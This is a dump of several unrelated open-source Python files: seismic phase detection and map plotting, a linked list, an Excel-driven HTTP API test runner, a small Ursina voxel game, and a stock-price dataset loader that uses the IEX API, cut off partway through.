sta.resample(resampleN)\r\n\r\nfrom ..io.parRead import StaReader,DataLoader,collate_function\r\ndef getStaLQuick(staInfos, staTimeML=[], modelL=[],\\\r\n date=obspy.UTCDateTime(0),taupM=tool.quickTaupModel(),\\\r\n mode='mid',isPre=True,f=[2, 15],R=[-90,90,\\\r\n -180,180],maxD=80,f_new=[-1,-1],delta0=0.02,resampleN=-1,\\\r\n isClearData=False,num_workers=5):\r\n staReader = StaReader(staInfos,getStaLQuick,date,f,taupM,R,delta0,f_new,resampleN)\r\n parReader = DataLoader(staReader,batch_size=1,collate_fn=collate_function,num_workers=num_workers)\r\n staL=[]\r\n for tmp in parReader:\r\n for t in tmp:\r\n staL.append(t)\r\n if not isPre:\r\n return staL\r\n for i in range(len(staInfos)):\r\n if len(staTimeML)>0:\r\n staTimeM=staTimeML[i]\r\n else:\r\n staTimeM=None\r\n print(ctime(),'predict on sta: ',date,i)\r\n staL[i].predict(modelL, staTimeM, mode,\\\r\n maxD=maxD,isClearData=isClearData)\r\n return staL\r\n\r\n\r\ndef showExample(filenameL,modelL,delta=0.02,t=[]):\r\n data=getTrace3ByFileName(filenameL,freq=[2,15])\r\n data=data.Data()[:2000*50]\r\n \r\n #i0=int(750/delta)\r\n #i1=int(870/delta)\r\n #plt.specgram(np.sign(data[i0:i1,1])*(np.abs(data[i0:i1,1])**0.5),NFFT=200,Fs=50,noverlap=190)\r\n data/=data.max()/2\r\n #plt.colorbar()\r\n #plt.show()\r\n plt.close()\r\n plt.figure(figsize=[4,4])\r\n yL=[predictLongData(modelL[i],data) for i in range(2)]\r\n timeL=np.arange(data.shape[0])*delta-720\r\n #print(data.shape,timeL.shape)\r\n for i in range(3):\r\n plt.plot(timeL,np.sign(data[:,i])*(np.abs(data[:,i]))+i,'k',linewidth=0.3)\r\n for i in range(2):\r\n plt.plot(timeL,yL[i]-i-1.5,'k',linewidth=0.5)\r\n if len(t)>0:\r\n plt.xlim(t)\r\n plt.yticks(np.arange(-2,3),['S','P','E','N','Z'])\r\n plt.ylim([-2.7,3])\r\n plt.xlabel('t/s')\r\n plt.savefig('fig/complexCondition.eps')\r\n plt.savefig('fig/complexCondition.tiff',dpi=300)\r\n plt.close()\r\n \r\n\r\ndef showExampleV2(filenameL,modelL,delta=0.02,t=[],staName='sta'):\r\n data=getTrace3ByFileName(filenameL,freq=[2,15],delta=delta)\r\n data=data.Data()[:3500*50]\r\n \r\n #i0=int(750/delta)\r\n #i1=int(870/delta)\r\n #plt.specgram(np.sign(data[i0:i1,1])*(np.abs(data[i0:i1,1])**0.5),NFFT=200,Fs=50,noverlap=190)\r\n data/=data.max()/2\r\n #plt.colorbar()\r\n #plt.show()\r\n plt.close()\r\n plt.figure(figsize=[4,4])\r\n yL=[predictLongData(model,data) for model in modelL]\r\n timeL=np.arange(data.shape[0])*delta-720\r\n #print(data.shape,timeL.shape)\r\n for i in range(3):\r\n plt.plot(timeL,np.sign(data[:,i])*(np.abs(data[:,i]))+i,'k',linewidth=0.3)\r\n for i in range(len(modelL)):\r\n plt.plot(timeL,yL[i]-i-1.5,'k',linewidth=0.5)\r\n #plt.plot(timeL,yL[i]*0+0.5-i-1.5,'--k',linewidth=0.5)\r\n if len(t)>0:\r\n plt.xlim(t)\r\n plt.yticks(np.arange(-4,3),['S1','S0','P1','P0','E','N','Z'])\r\n plt.ylim([-4.7,3])\r\n plt.xlabel('t/s')\r\n plt.savefig('fig/complexConditionV2_%s.eps'%staName)\r\n plt.savefig('fig/complexConditionV2_%s.tiff'%staName,dpi=300)\r\n plt.close()\r\n\r\ndef plotRes(staL, quake, filename=None):\r\n colorStr='br'\r\n for record in quake.records:\r\n color=0\r\n pTime=record['pTime']\r\n sTime=record['sTime']\r\n staIndex=record['staIndex']\r\n if staIndex>100:\r\n color=1\r\n #print(staIndex,pTime,sTime)\r\n st=quake['time']-10\r\n et=sTime+40\r\n if sTime==0:\r\n et=pTime+60\r\n pD=(pTime-quake['time'])\r\n if pTime ==0:\r\n pD = ((sTime-quake['time'])/1.73)\r\n if staL[staIndex].data.bTime<0:\r\n continue\r\n #print(st, et, staL[staIndex].data.delta)\r\n timeL=np.arange(st, et, staL[staIndex].data.delta)\r\n #data = staL[staIndex].data.getDataByTimeL(timeL)\r\n data=staL[staIndex].data.getDataByTimeLQuick(timeL)\r\n if timeL.shape[0] != data.shape[0]:\r\n print('not same length for plot')\r\n continue\r\n if timeL.size<1:\r\n print(\"no timeL for plot\")\r\n continue\r\n indexL=np.arange(data.shape[0])\r\n if pTime>0:\r\n index0=max(int((pTime-5-st)/staL[staIndex].data.delta),0)\r\n index1=int((pTime+5-st)/staL[staIndex].data.delta)\r\n indexL=np.arange(index0,index1)\r\n #if record.pProb()>1 or record.pProb()<0:\r\n # plt.plot(timeL, data[:, 2]/data[indexL,2].max()+pD,colorStr[color],linewidth=0.3)\r\n #else:\r\n if True:\r\n #color = prob2color(record['pProb'])\r\n if isinstance(quake,QuakeCC):\r\n color = prob2color(record['pCC'])\r\n pValue = record['pCC']\r\n sValue = record['sCC']\r\n else:\r\n color = prob2color(record['pProb'])\r\n pValue = record['pProb']\r\n sValue = record['sProb']\r\n plt.plot(timeL, data[:, 2]/data[indexL,2].max()+pD,color=color,linewidth=0.3)\r\n plt.text(timeL[0],pD+0.5,'%s %.2f %.2f'%(staL[staIndex].station,pValue,\\\r\n sValue))\r\n if pTime>0:\r\n plt.plot([pTime, pTime], [pD+2, pD-2], 'g',linewidth=0.5)\r\n if sTime >0:\r\n plt.plot([sTime, sTime], [pD+2, pD-2], 'r',linewidth=0.5)\r\n if isinstance(quake,QuakeCC):\r\n plt.title('%s %.3f %.3f %.3f %.3f cc:%.3f' % (obspy.UTCDateTime(quake['time']).\\\r\n ctime(), quake['la'], quake['lo'],quake['dep'],quake['ml'],quake['cc']))\r\n else:\r\n plt.title('%s %.3f %.3f %.3f %.3f' % (obspy.UTCDateTime(quake['time']).\\\r\n ctime(), quake['la'], quake['lo'],quake['dep'],quake['ml']))\r\n if filename==None:\r\n plt.show()\r\n if filename!=None:\r\n dayDir=os.path.dirname(filename)\r\n if not os.path.exists(dayDir):\r\n os.mkdir(dayDir)\r\n plt.savefig(filename,dpi=200)\r\n plt.close()\r\n\r\ndef plotResS(staL,quakeL, outDir='output/'):\r\n for quake in quakeL:\r\n filename=outDir+'/'+quake['filename'][0:-3]+'png'\r\n #filename=outDir+'/'+str(quake.time)+'.jpg'\r\n #try:\r\n plotRes(staL,quake,filename=filename)\r\n #except:\r\n # pass\r\n #else:\r\n # pass\r\n\r\ndef plotQuakeL(staL,quakeL,laL,loL,outDir='output/',filename='',vModel=None,isPer=False):\r\n dayIndex = int(quakeL[-1]['time']/86400)\r\n Ymd = obspy.UTCDateTime(dayIndex*86400).strftime('%Y%m%d')\r\n if len(filename)==0:\r\n filename = '%s/%s_quake_loc.jpg'%(outDir,Ymd)\r\n dayDir=os.path.dirname(filename)\r\n if not os.path.exists(dayDir):\r\n os.mkdir(dayDir)\r\n m = basemap.Basemap(llcrnrlat=laL[0],urcrnrlat=laL[1],llcrnrlon=loL[0],\\\r\n urcrnrlon=loL[1])\r\n staLa= []\r\n staLo=[]\r\n for sta in staL:\r\n if sta.data.bTime>0:\r\n staLa.append(sta.loc[0])\r\n staLo.append(sta.loc[1])\r\n #staLa,staLo = staL.loc()\r\n staX,staY=m(np.array(staLo)%360,np.array(staLa))\r\n m.plot(staX,staY,'b^',markersize=4,alpha=0.2)\r\n eLa= []\r\n eLo=[]\r\n for quake in quakeL:\r\n eLa.append(quake['la'])\r\n eLo.append(quake['lo'])\r\n eX,eY=m(np.array(eLo)%360,np.array(eLa))\r\n #m.etopo()\r\n for fault in faultL:\r\n if fault.inR(laL+loL):\r\n fault.plot(m,markersize=0.3)\r\n m.plot(eX,eY,'ro',markersize=0.5)\r\n parallels = np.arange(-90,90,3)\r\n m.drawparallels(parallels,labels=[False,True,True,False])\r\n meridians = np.arange(10.,360.,3)\r\n plt.gca().yaxis.set_ticks_position('right')\r\n m.drawmeridians(meridians,labels=[True,False,False,True])\r\n plt.title(Ymd)\r\n plt.savefig(filename,dpi=300)\r\n plt.close()\r\n\r\ndef plotQuakeLDis(staInfos,quakeL,laL,loL,outDir='output/',filename='',isTopo=False,rL=[],R0=[],isBall=False,figSize=[6.2,5],width=0.06):\r\n dayIndex = int(quakeL[-1]['time']/86400)\r\n Ymd = obspy.UTCDateTime(dayIndex*86400).strftime('%Y%m%d')\r\n if len(filename)==0:\r\n filename = '%s/%s_quake_loc.jpg'%(outDir,Ymd)\r\n dayDir=os.path.dirname(filename)\r\n if not os.path.exists(dayDir):\r\n os.mkdir(dayDir)\r\n fig=plt.figure(figsize=figSize)\r\n m = basemap.Basemap(llcrnrlat=laL[0],urcrnrlat=laL[-1],llcrnrlon=loL[0],\\\r\n urcrnrlon=loL[-1])\r\n if len(staInfos)>0:\r\n req={'staInfos':staInfos,'minCover':0.5,'minMl':-5}\r\n else:\r\n req={'minMl':-5}\r\n req={}\r\n pL=quakeL.paraL(req=req)\r\n eX,eY,=m(np.array(pL['lo']),np.array(pL['la']))\r\n #m.etopo()\r\n ml,dep=[np.array(pL['ml']),np.array(pL['dep'])]\r\n for fault in faultL:\r\n if fault.inR(laL+loL):\r\n fh=fault.plot(m,markersize=0.3)\r\n \r\n #m.plot(eX,eY,'ro',markersize=2)\r\n #m.etopo()\r\n if isTopo:\r\n plotTopo(m,laL+loL)\r\n #sc=m.scatter(eX,eY,c=dep,s=((ml*0+1)**2)*0.3/3,vmin=-5,vmax=50,cmap='gist_rainbow')#Reds\r\n #sc=m.scatter(eX,eY,c=dep,s=((ml*0+1)**2)*0.3/3,vmin=-5,vmax=50,cmap='jet')\r\n if not isBall:\r\n eh=m.plot(eX,eY,'.r',markersize=0.3,alpha=1,linewidth=0.01)\r\n else:\r\n ax = plt.axes()\r\n sdr0L=[]\r\n xyL=[]\r\n for quake in quakeL:\r\n sdr0L.append(quake['sdr0'])\r\n xyL.append((quake['lo'],quake['la']))\r\n ball=imaging.beachball.beach(sdr0L[-1],xy=xyL[-1],width=width,facecolor='r',size=20)\r\n ax.add_collection(ball) \r\n staLa= []\r\n staLo=[]\r\n for sta in staInfos:\r\n staLa.append(sta.loc()[0])\r\n staLo.append(sta.loc()[1])\r\n #staLa,staLo = staL.loc()\r\n staX,staY=m(np.array(staLo),np.array(staLa))\r\n sh=m.plot(staX,staY,'k^',markersize=3,alpha=1)\r\n #plt.legend([st,sc,f],['station','event','fault'])\r\n #m.arcgisimage()\r\n #plt.scatter()\r\n parallels = np.arange(0.,90,3)\r\n m.drawparallels(parallels,labels=[False,True,True,False])\r\n meridians = np.arange(10.,360.,3)\r\n m.drawmeridians(meridians,labels=[True,False,False,True])\r\n plt.gca().yaxis.set_ticks_position('left')\r\n #plt.title('Detection Results')\r\n #cbar=fig.colorbar(sc, orientation=\"horizontal\", fraction=0.046, pad=0.04)\r\n #cbar.set_label('Depth')\r\n #plt.colorbar()\r\n #plt.legend((sh,eh,fh),['station','earthquake','fault'],loc=1)\r\n fig.tight_layout()\r\n for R in rL:\r\n x,y=m(R.xyL[:,1],R.xyL[:,0])\r\n plt.arrow(x[0],y[0],x[1]-x[0],y[1]-y[0],color='b')\r\n plt.text(x[0],y[0],R.name,ha='left',va='bottom',c='b',size=12,weight='bold')\r\n plt.text(x[1],y[1],R.name+'\\'',ha='right',va='top',c='b',size=12,weight='bold')\r\n R=R0\r\n if len(R)>0:\r\n la = [R[0],R[0],R[1],R[1],R[0]]\r\n lo = [R[2],R[3],R[3],R[2],R[2]]\r\n x,y=m(lo,la)\r\n plt.plot(x,y,color='r',linewidth=1)\r\n plt.savefig(filename,dpi=300)\r\n\r\n plt.close()\r\n\r\ndef showStaCover(aMat,staTimeML,filename='cover.jpg'):\r\n fig=plt.figure(figsize=[5,5])\r\n aM = np.zeros([aMat.laN,aMat.loN])\r\n for staTimeM in staTimeML:\r\n aM[staTimeM.minTimeD<=21]+=1\r\n laL=[]\r\n loL=[]\r\n for a in aMat.subareas[0]:\r\n loL.append(a.midLo)\r\n for a in aMat.subareas:\r\n laL.append(a[0].midLa)\r\n m = basemap.Basemap(llcrnrlat=laL[0],urcrnrlat=laL[-1],llcrnrlon=loL[0],\\\r\n urcrnrlon=loL[-1])\r\n aX,aY=m(np.array(loL),np.array(laL))\r\n setMap(m)\r\n #m.pcolor(aX,aY,(aM.transpose()>2)*np.log(aM.transpose()+1),cmap='jet')\r\n pc=m.pcolor(aX,aY,(aM>2)*aM,cmap='jet')\r\n for fault in faultL:\r\n if fault.inR(laL+loL):\r\n fault.plot(m,markersize=0.3)\r\n cbar=fig.colorbar(pc, orientation=\"horizontal\",fraction=0.046, pad=0.04)\r\n cbar.set_label('Station Coverage')\r\n plt.savefig(filename,dpi=300)\r\n\r\ndef setMap(m):\r\n \r\n parallels = np.arange(0.,90,3)\r\n m.drawparallels(parallels,labels=[False,True,True,False])\r\n meridians = np.arange(10.,360.,3)\r\n m.drawmeridians(meridians,labels=[True,False,False,True])\r\n \r\n plt.gca().yaxis.set_ticks_position('left')\r\n\r\n\r\n\r\n'''\r\n\r\ndef getStaLByQuake(staInfos, aMat, staTimeML, modelL,quake,\\\r\n getFileName=originFileName,taupM=tool.quickTaupModel(), \\\r\n mode='mid', N=5,isPre=False,bTime=-100,delta0=0.02):\r\n staL=[None for i in range(len(staInfos))]\r\n threads = list()\r\n for i in range(len(staInfos)):\r\n staInfo=staInfos[i]\r\n nt = staInfo['net']\r\n st = staInfo['sta']\r\n loc = [staInfo['la'],staInfo['lo']]\r\n print('process on sta: ',i)\r\n dis=DistAz(quake.loc[0],quake.loc[1],staInfos[i]['la'],\\\r\n staInfos[i]['lo']).getDelta()\r\n date=obspy.UTCDateTime(quake.time+taupM.get_travel_times(quake.loc[2],dis)[0].time+bTime)\r\n getSta(staL, i, nt, st, date, modelL, staTimeML[i], loc, \\\r\n [0.01, 15], getFileName, taupM, mode,isPre=isPre,delta0=delta0)\r\n return staL\r\n'''\r\n","repo_name":"baogegeJiang/SeismTool","sub_path":"detector/detecQuake.py","file_name":"detecQuake.py","file_ext":"py","file_size_in_byte":38471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6237930367","text":"class Node:\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n\nclass LinkedList:\n def linked_list(lis):\n node = Node(lis[0])\n head = node\n for i in range(1, len(lis)):\n node.next = Node(lis[i])\n node = node.next\n return head\n\n \n ","repo_name":"apoorvtyagii/DataStructuresAndAlgorithms","sub_path":"ds/linkedlist/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1795968518","text":"# coding:utf-8\n'''\n 封装requests方法\n'''\nimport json\nimport requests\n\nfrom Ademo_unittest_logging_email_test.common import read_excel\nfrom Ademo_unittest_logging_email_test.common.write_excel import copy_excel,Write_excel\n\ndef send_requests(testdata):\n '''封装requests请求'''\n id = testdata['id']\n case_name = testdata['case_name']\n method = testdata[\"method\"]\n url_base = testdata[\"url\"]\n # 因为发现读取接口url时,最后带上了换行符,所以把右边的空格全删除\n url = url_base.rstrip()\n # params\n #try:\n # eval(expression,globals=None,locals=None):expression:传入的表达式;globals是可选参数,不设置时,则必须为dict对象,locals:不为None时,可以是任何map对象\n #params = eval(testdata[\"params\"])\n #except:\n #params = None\n params = testdata['params']\n try:\n headers = eval(testdata[\"headers\"])\n print(\"请求头部:%s\" % headers)\n except:\n headers = None\n\n type = testdata[\"type\"]\n #test_api = testdata['func_name']\n test_nub = testdata['id']\n\n print(\"测试用例场景:%s\" % case_name)\n print(\"请求url: %s\" % url)\n print(\"请求params:%s\" % params)\n\n try:\n bodydata = eval(testdata[\"body\"])\n except:\n bodydata = {}\n\n # 判断传data数据还是json\n if type == \"data\":\n body = bodydata\n elif type == \"json\":\n body = json.dumps(bodydata)\n else:\n body = bodydata\n\n # 判断选择调用request的某个方法\n try:\n if method == \"post\":\n print(\"post请求body类型为:%s ,body内容为:%s\" % (type, body))\n r = requests.post(url=url,data=params,headers={'content-type': 'application/json'})\n print(r.status_code)\n\n elif method == 'get':\n print(\"get请求!\") # body类型为:%s ,body内容为:%s\" % (type, body))\n r = requests.get(url=url, data=params)\n\n elif method == 'patch':\n pass\n\n elif method == 'put':\n pass\n else:\n print('其他请求,结束!')\n return None\n\n print(\"页面返回信息:%s\" % r.content.decode(\"utf-8\"))\n\n # 接受返回数据\n res = {}\n res['id'] = testdata['id']\n res['rowNum'] = testdata['id'] + 1 # 第一行被字段占用,所以需要\n res[\"statuscode\"] = str(r.status_code) # 状态码转成str\n res[\"text\"] = r.content.decode(\"utf-8\")\n res[\"times\"] = str(r.elapsed.total_seconds()) # 接口请求时间转str\n\n if res[\"statuscode\"] != \"200\":\n res[\"error\"] = res['text']\n else:\n res[\"error\"] = \"\"\n\n res[\"msg\"] = \"\"\n\n # 进行判断\n if testdata[\"checkpoint\"] in res[\"text\"]:\n res[\"result\"] = \"pass\"\n print(\"用例测试结果: %s---->%s\" % (test_nub, res[\"result\"]))\n else:\n res[\"result\"] = \"fail\"\n return res\n\n except Exception as msg:\n res[\"msg\"] = str(msg)\n return res\n\ndef wirte_result(result, filename=\"result.xlsx\"):\n # 返回结果的行数row_nub\n row_nub = result['rowNum']\n # 写入statuscode\n wt = Write_excel(filename)\n wt.write(row_nub, 9, result['statuscode']) # 写入返回状态码statuscode,第8列\n wt.write(row_nub, 10, result['times']) # 耗时\n wt.write(row_nub, 11, result['error']) # 状态码非200时的返回信息\n wt.write(row_nub, 13, result['result'])\n wt.write(row_nub, 14, result['msg']) # 抛异常\n\n\nif __name__ == \"__main__\":\n data = read_excel.ApiDefine_change('F:\\Python_project\\Ademo_unittest_logging_email_test\\dataExcel\\出口合理性分析导出接口new.xlsx').dict_data()\n print(data)\n #s = requests.session()\n res = send_requests(data)\n copy_excel(\"出口合理性分析导出接口new.xlsx\", \"result.xlsx\")\n wirte_result(res, filename=\"result.xlsx\")\n","repo_name":"lipingxx/Ademo_requests_unittest_ddt_excel","sub_path":"common/requestsModule.py","file_name":"requestsModule.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33155579551","text":"from turtle import position\nfrom pygments import highlight\nfrom ursina import *\nfrom ursina.prefabs.first_person_controller import FirstPersonController\n\napp = Ursina()\n\n# define a Voxel class\n# by setting the parent to scene and the model to 'cube' it becomes a 3d button\n\nclass Voxel(Button):\n def __init__(self, position=(0,0,0)):\n super().__init__(\n parent = scene,\n position = position,\n model = 'cube',\n origin_y = .5,\n texture = 'white_cube',\n color = color.color(0,0,random.uniform(.9, 1.0)),\n highlight_color = color.lime,\n )\n\n def input(self, key):\n if self.hovered:\n if key == 'left mouse down':\n voxel = Voxel(position=self.position + mouse.normal)\n\n if key == 'right mouse down':\n destroy(self)\n\nfor z in range(8):\n for x in range(8):\n voxel = Voxel(position=(x,0,z))\n\nplayer = FirstPersonController()\napp.run()","repo_name":"FDlucifer/python-climb-learning-tutorial","sub_path":"advanced-python-tutorial/3D Game Development/main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"37173301583","text":"import warnings\nimport os\n\nimport math\nimport random\nimport datetime\nimport pytz\nimport requests\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom pandas.io.json import json_normalize\n\nfrom scipy.stats.stats import pearsonr\n\n# Linear Regression\nfrom sklearn.linear_model import LinearRegression\n\n# Arima\nfrom pyramid.arima import auto_arima\n\n# Facebook's Prophet\nfrom fbprophet import Prophet\n\n# Long Short Term Memory\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM\n\n# Makes Keras picklable\nfrom tools.make_keras_picklable import make_keras_picklable\nmake_keras_picklable()\n\n\n\n#--------------------------------------\n# Common functions\n#--------------------------------------\n\ndef expand_date_in_dataframe(df):\n \"\"\"\n It breaks the date attibute (assuming it's a datetime) of a dataframe in more fileds\n for year, month, day, week, day of week and day of year.\n \"\"\"\n df['year'] = df.date.dt.year\n df['month'] = df.date.dt.month\n df['day'] = df.date.dt.day\n df['week'] = df.date.dt.week\n df['dayofweek'] = df.date.dt.dayofweek\n df['dayofyear'] = df.date.dt.dayofyear\n\n\ndef add_timestamp_to_dataframe(df):\n \"\"\"\n It add a representation of the date attibute (assuming it's a datetime) as a timestamp.\n \"\"\"\n df['timestamp'] = df.date.values.astype(np.int64)\n\n\ndef str_to_datetime(date):\n \"\"\"\n Converts a string into a datetime.\n\n :param str date: The string representation in the format 'yyyy-mm-dd' of the date to convert.\n :return: The resulting datetime.\n :rtype: datetime.datetime\n \"\"\"\n return datetime.datetime.strptime(date, '%Y-%m-%d')\n\n\ndef datetime_array_to_dataframe(days):\n \"\"\"\n Gets a dataframe from an array of dates.\n\n :param list[datetime.datetime] date: The array of dates.\n :return: The dataframe.\n :rtype: pandas.DataFrame\n \"\"\"\n return pd.DataFrame({'date': days})\n\n\n\n#--------------------------------------\n# Dataset management\n#--------------------------------------\n\nclass Dataset:\n \"\"\"\n This class is used to manage the dataset that contains the hsitoric stock prices\n for the companies contemplated in the Dow Jones Industrial Average.\n \"\"\"\n\n \"\"\" Ticker symbols of the companies contemplated in the Dow Jones Industrial Average. \"\"\"\n DJIA_TICKERS = [\n 'BA', 'PFE', 'MCD', 'WMT', 'KO', 'MRK', 'HD', 'V', 'JNJ', 'VZ',\n 'CSCO', 'AXP', 'TRV', 'DIS', 'MSFT', 'UNH', 'DWDP', 'CAT', 'AAPL', 'UTX',\n 'MMM', 'JPM', 'IBM', 'GS', 'XOM', 'INTC', 'NKE', 'CVX', 'PG', 'WBA' ]\n\n \"\"\" This is the symbol used by the actual average, i.e. the Dow Jones Industrial Average. \"\"\"\n DJIA_SYMBOL = 'DIA'\n\n \"\"\" Value used to get the historical data from 5 years ago. \"\"\"\n HIST_5Y = '5y'\n\n \"\"\" Value used to get the historical data from 1 year ago. \"\"\"\n HIST_1Y = '1y'\n\n \"\"\" Value used to get the historical data from 1 month ago. \"\"\"\n HIST_1M = '1m'\n\n \"\"\"\n This is the template to create the URL to extract historical stock prices\n from the IEX API.\n \"\"\"\n __IEX_API_URL_TEMPLATE = 'https://api.iextrading.com/1.0/stock/{}/chart/{}'\n\n\n def __init__(self, dataframe=None):\n \"\"\"\n The constructor of Dataset.\n\n :param pandas.DataFrame df: The dataframe containing stock price historical records,\n which will be actual data.\n \"\"\"\n self.dataframe = dataframe\n\n\n @staticmethod\n def __preprocess_dataframe(df):\n \"\"\"\n Pre-processes a dataframe containing stock price historical records (from IEX)\n by removing the columns that are not useful to make future predictions\n and expanding the date in more columns.\n\n :param pandas.DataFrame df: The dataframe containing stock price historical records.\n :return: The pre-processed dataframe.\n :rtype: pandas.DataFrame\n \"\"\"\n formated_df = df.drop(['label',\n 'change', 'changeOverTime', 'changePercent',\n 'high', 'low', 'open',\n 'unadjustedVolume', 'volume', 'vwap'],\n axis=1)\n\n return formated_df\n\n\n @staticmethod\n def __get_dataframe_for_ticker(ticker_symbol, hist_period):\n \"\"\"\n Retrieves the historic prices for a particuler stock from the data source,\n i.e. the IEX API.\n\n :param str ticker_symbol: The ticker symbol or symbols to filter the data.\n :param str hist_period: The period to retrieve historical records,\n p.e '5y' for 5 years, '1y' for 1 year, '1m' for 1 month, etc.\n :return: The dataframe containing the historic prices.\n :rtype: pandas.DataFrame\n \"\"\"\n # Getting the historic records from IEX\n r = requests.get(url=Dataset.__IEX_API_URL_TEMPLATE.format(ticker_symbol.lower(), hist_period))\n df = json_normalize(r.json())\n\n # Converting the date to a datetime\n df.date = pd.to_datetime(df.date, format='%Y-%m-%d')\n\n # Adding the ticker symbol as a new column\n df.insert(loc=0, column='symbol', value=ticker_symbol)\n\n return Dataset.__preprocess_dataframe(df)\n\n\n @staticmethod\n def __get_djia_dataframe(hist_period):\n \"\"\"\n Gets a dataframe containing historic prices for stocks in the Dow Jones Industrial Average.\n\n :param str hist_period: The period to retrieve historical records,\n p.e '5y' for 5 years, '1y' for 1 year, '1m' for 1 month, etc.\n :return: The dataframe containing the historic prices.\n :rtype: pandas.DataFrame\n \"\"\"\n # Getting the historic records of the average\n df = Dataset.__get_dataframe_for_ticker(Dataset.DJIA_SYMBOL, hist_period)\n\n # Retrieves the historic records for each one of the ticker symbols in the\n # Dow Jones Industrial Average\n for ticker_symbol in Dataset.DJIA_TICKERS:\n df = df.append(Dataset.__get_dataframe_for_ticker(ticker_symbol, hist_period))\n\n return df\n\n\n @staticmethod\n def __update_djia_dataframe(df):\n \"\"\"\n Updates a dataframe containing historic prices for stocks in the Dow Jones Industrial Average,\n by retrieving the most recent records from the information source.\n\n :param pandas.DataFrame hist_period: The dataframe containing stock price historical records.\n :return: The dataframe containing the historic prices.\n :rtype: pandas.DataFrame\n \"\"\"\n\n # Getting the amount of days that need to be updated\n last_recorded_day = max(df.date)\n today = datetime.datetime.now()\n days_to_update = (today - last_recorded_day).days\n\n # Deciding the historic period to request to the source according to the days that\n # need to be updated\n hist_period = Dataset.HIST_5Y\n if days_to_update < 1:\n return df\n elif days_to_update < 28:\n hist_period = Dataset.HIST_1M\n elif days_to_update < 365:\n hist_period = Dataset.HIST_1Y\n\n # Getting the data frame containing the missing records\n last_df = Dataset.__get_djia_dataframe(hist_period)\n\n # Appending the missing records, dropping the duplicates and returning\n return df.append(last_df).drop_duplicates(['symbol', 'date'], keep='last')\n\n\n @staticmethod\n def loadDatasetFromFile(file_name):\n \"\"\"\n Loads the dataset from a file where data was previously stored.\n\n :param str file_name: The name of the file to load the data from. \n \"\"\"\n with open(file_name, 'rb') as fp:\n return Dataset(pickle.load(fp))\n\n\n def saveDataToFile(self, file_name=None):\n \"\"\"\n Saves the current dataset to a file.\n\n :param file_name: The name of the file to save the data,\n if None the data is saved to a file in the 'data' directory\n using a name of the form 'djia_yyyymmdd-yyyymmdd.pkl'\n with the minimum and maximum recorded dates. \n :type file_name: str or None\n :return: The name of the file used to store the data.\n :rtype: str\n \"\"\"\n if file_name is None:\n file_name = os.path.join(\n 'data',\n 'djia_{:%Y%m%d}-{:%Y%m%d}.pkl'.format(min(self.dataframe.date), max(self.dataframe.date)))\n\n with open(file_name, 'wb') as fp:\n pickle.dump(self.dataframe, fp)\n\n return file_name\n\n\n @staticmethod\n def createDataset(hist_period=HIST_5Y):\n \"\"\"\n Creates a dataset with brand new data,\n by default it retrieves historical records from the last 5 years.\n\n :param str hist_period: The period to retrieve historical records, 5 years ('5y') by default.\n :return: The new dataset.\n :rtype: Dataset\n \"\"\"\n return Dataset(Dataset.__get_djia_dataframe(hist_period))\n\n\n def updateData(self):\n \"\"\"\n Updates the dataset by getting the most recent history records from the source.\n Note: This method is intended to be run periodicaly in order to keep the dataset up to date.\n \"\"\"\n self.dataframe = Dataset.__update_djia_dataframe(self.dataframe)\n\n\n def getDataframe(self, ticker_symbol=None, from_date=None, to_date=None):\n \"\"\"\n Gets a dataframe containing a subset of the records of the current dataset,\n which is obtained by filtering by a ticker symbol or list (array) of ticker symbols\n and/or a date range.\n\n :param ticker_symbol: The ticker symbol or symbols to filter the data.\n :type ticker_symbol: str or list[str] or None\n :param from_date: The minimum date to appear in the records of the subset.\n :type from_date: datetime.datetime or None\n :param to_date: The maximum date to appear in the records of the subset.\n :type to_date: datetime.datetime or None\n :return: The dataframe with the subset resulted of filtering the dataset.\n :rtype: pandas.DataFrame\n \"\"\"\n df = self.dataframe\n\n if ticker_symbol is not None:\n if isinstance(ticker_symbol, str): # If ticker_symbol symbol is a string\n df = df.query(\"symbol == '{}'\".format(ticker_symbol))\n elif isinstance(ticker_symbol, list): # If ticker_symbol symbol is an array\n # Creates a query expression as a sequence of ORs\n ticker_symbol_query = None\n for t in ticker_symbol:\n ticker_symbol_exp = \"symbol == '{}'\".format(t)\n if ticker_symbol_query is None:\n ticker_symbol_query = ticker_symbol_exp\n else:\n ticker_symbol_query += \"or \" + ticker_symbol_exp\n df = df.query(ticker_symbol_query)\n\n if from_date is not None:\n df = df.query(\"date >= '{}'\".format(from_date))\n\n if to_date is not None:\n df = df.query(\"date <= '{}'\".format(to_date))\n\n return df\n\n\n\n def getSubset(self, ticker_symbol=None, from_date=None, to_date=None):\n \"\"\"\n Gets a subset of the current dataset filtered \n by a ticker symbol or list (array) of ticker symbols and/or a date range.\n\n :param ticker_symbol: The ticker symbol or symbols to filter the data.\n :type ticker_symbol: str or list[str] or None\n :param from_date: The minimum date to appear in the records of the subset.\n :type from_date: datetime.datetime or None\n :param to_date: The maximum date to appear in the records of the subset.\n :type to_date: datetime.datetime or None\n :return: The subset resulted of filtering the dataset.\n :rtype: Dataset\n \"\"\"\n df = self.getDataframe(ticker_symbol=ticker_symbol, from_date=from_date, to_date=to_date)\n return Dataset(df)\n\n\nclass TradingDaysHelper:\n \"\"\"\n This is a helper to retrieve the days that the market is open.\n The market holidyas are loaded from a file, by default 'market_holidays.txt'.\n \"\"\"\n\n def __init__(self, market_holidays_file='market_holidays.txt'):\n \"\"\"\n The constructor.\n\n :param str market_holidays_file: The file containing the market holidays,\n by default 'market_holidays.txt'.\n \"\"\"\n self.market_holidays = []\n\n with open(market_holidays_file) as f:\n lines = f.readlines()\n\n for line in lines:\n self.market_holidays.append(datetime.datetime.strptime(line.strip(), '%Y-%m-%d'))\n\n\n def __is_trading_day(self, day):\n \"\"\"\n Verifies if in a 